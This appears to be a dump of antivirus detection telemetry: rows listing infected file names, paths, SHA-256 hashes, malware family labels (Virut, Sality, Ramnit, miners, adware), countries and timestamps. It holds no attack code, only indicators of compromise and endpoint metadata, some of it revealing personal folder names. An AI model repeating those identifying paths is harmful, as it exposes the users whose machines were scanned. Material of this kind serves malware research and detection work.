  Row(detection=Row(filename='odin3-v3.10.6.exe', filepath='\\\\?\\F:\\New folder (9)\\Compressed\\CF-Auto-Root-j5lte-j5ltedx-smj500g\\Odin3-v3.10.6.exe', filesize=2304000, name='W32/Virut.Gen.#M1.#R1'), hash='bf58a04df5dde2d8b4590378205b23b313c940a1b53ec478f8b7e227531c1d90', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:59:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T16:27:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~wrl3996.tmp', filepath='f:\\bsi__and_pps_surveillance_2016\\monthly report 2015\\8 august 2015\\hai august\\~WRL3996.tmp', filesize=64000, name='EXP/CVE-2006-2492.#M1.#R1'), hash='6d744386027c4bd87b2e9b0265a0ba3c6c70a26b9cf3106800e251d2af7ba16d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T12:16:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:42:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msn.exe', filepath='\\\\?\\C:\\win\\msn.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:45:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T19:44:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-093201-1eb230ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d29325e0\\AVSCAN-20181104-091928-B5729AAE\\AVSCAN-20181104-093201-1EB230EF', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:33:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:13:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='nclmsbtsrv.exe', filepath='\\\\?\\C:\\Program Files (x86)\\PC Connectivity Solution\\Transports\\NclMSBTSrv.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='007a1782055e9028561d848c117d980b9db294f577716f8970e8f866dde07777', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:52:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-schnellabrechnung_1_.exe', filepath='C:\\Users\\X\\Documents\\RA_BOERNER\\Hausverwaltung\\Software\\Downloader-fuer-schnellabrechnung_1_.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='8e2b288f35b23e609aa9ebe86b565b1bda072e8c9f28bc3a4b4d81573a97512c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T19:34:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150603-91525f86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150603-91525F86', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:06:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe748_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe748 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T23:58:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered domim', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered domim', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='799dce4b02eb3a40aa802e0176118bef8b43a529a60d553fb6c08b7e7726dad8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T08:21:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='34835e4d-547e-1735-adc9-16a3df9122f1.exe', filepath='h:\\{b1fba84f-834a-faa0-7a17-0065e1e21247}\\34835e4d-547e-1735-adc9-16a3df9122f1.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='17bcdcfb4288765797884a83bab607e7e9e9e73758e26108304b61b044653152', metadata=Row(cmdline="'Family day taska 2018\\\\'", country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=302592, timestamp='2018-11-04T13:09:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225626-d36ca787', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-225626-D36CA787', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:56:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rcp-be-lol-summoner.dll', filepath='D:\\เกมส์\\GameData\\Apps\\LoLTH\\LeagueClient\\Plugins\\rcp-be-lol-summoner\\rcp-be-lol-summoner.dll', filesize=988000, name='W32/Ramnit.C.#M1.#R1'), hash='2ec98d81a9260d6db52873c862ffb45c887c49c68f81b0bdc6d48ce846849fbe', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T02:26:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023ac0', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023ac0', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:40:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sp33404.exe', filepath='\\\\?\\E:\\رعد خاص\\New folder\\رعد 1\\تعريف أشبي\\New Folder\\sp33404.exe', filesize=6212000, name='W32/Sality.AT.#M1.#R1'), hash='070eafbd6c57a850a0e75aab477bcec2d14c3f31ab2d08101280ba1322058bd3', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:45:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243dd', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243dd', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msasrui.exe', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Application Data\\Microsoft\\Windows\\Windows Defender\\MSASRui.exe', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:10:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130852-2bc1d824', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ee14c03\\AVSCAN-20181104-130740-20707A78\\AVSCAN-20181104-130852-2BC1D824', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='003ba151219f945cb613302233617c71dbf7754e1527a1430de85cb1ac4d433f', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe308_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe308 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T04:54:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Users\\X\\Exeprog\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='0f288d754b7aa03647f982fffeb4b0e6921e0f1259876f86474ec3bd5202ad4d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:28:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:44:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194712-5744279f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77abea06\\AVSCAN-20181104-194023-17C93266\\AVSCAN-20181104-194712-5744279F', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:47:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:53:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220212-f7a35022', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220212-F7A35022', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:02:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:13:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:36:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:04:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:02:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:21:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\program files\\rhino 6\\system\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T03:59:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='6870db1b75e2b957090516236be37efdff5fca0054654e709c8c9ee3d95e0cc8', metadata=Row(cmdline='\\\\\\/Embedding', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T08:33:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T08:33:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:34:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xnmsiyyksslp.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\Okwhrrxoeoao\\Xnmsiyyksslp.exe', filesize=8000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='c3e96037801179753a4359185f793d195ae9aa07ccdb812c99feafdb1f93c0a3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:56:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:09:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214208-1ea579c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214208-1EA579C6', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='9889486a0a57ff8c858a9629729b4feacf47aa9f28ff1440d3f9cebfd5292acb', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T12:00:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xmv1aqti0e.exe', filepath='\\\\?\\D:\\Users\\X\\AppData\\Local\\Temp\\nsz1DF0.tmp\\xMV1aQTI0E.exe', filesize=3328000, name='HEUR/APC.#M1.#R1'), hash='8134f89d43ccc9b977a682d1fc8f197b4997bb4e77ddbe381d55018aeccb8666', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:01:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='20[2].htm', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\R1P7XMGN\\20[2].htm', filesize=8000, name='JS/ScrInject.ppsw.#M1.#R1'), hash='71d9f305c45d6b45f152d9224c4d1de65e863964d2804bceb3783a6f3d3b0a1a', metadata=Row(cmdline='SCODEF:5572 CREDAT:472081 \\\\\\/prefetch:2', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815304, timestamp='2018-11-04T20:45:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mapdrive.exe', filepath='H:\\HBCD\\Programs\\MapDrive.exe', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='H:\\HBCD\\HBCDMENU.EXE', parentsize=17920, timestamp='2018-11-02T22:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E025DDE317853E9B3D0F19A3C9754E7F959D562DD7627073C9891256044558B', filesize=1472000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='8e025dde317853e9b3d0f19a3c9754e7f959d562dd7627073c9891256044558b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:18:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='freeyoutubetomp3converter.vtsafe.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter.vtsafe.exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:57:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202831-10d23aff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-202831-10D23AFF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T12:22:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155825-07707275', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9386d26\\AVSCAN-20181102-152258-2921801E\\AVSCAN-20181102-155825-07707275', filesize=80000, name='PUA/GetNow.#M1.#R1'), hash='e7a06d0a0f96a453fb37ae5408ced0f81c7c0b79170fe65168e7ebaf5ed467af', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T13:58:27Z'), dt=datetime.date(2018, 11, 2)),
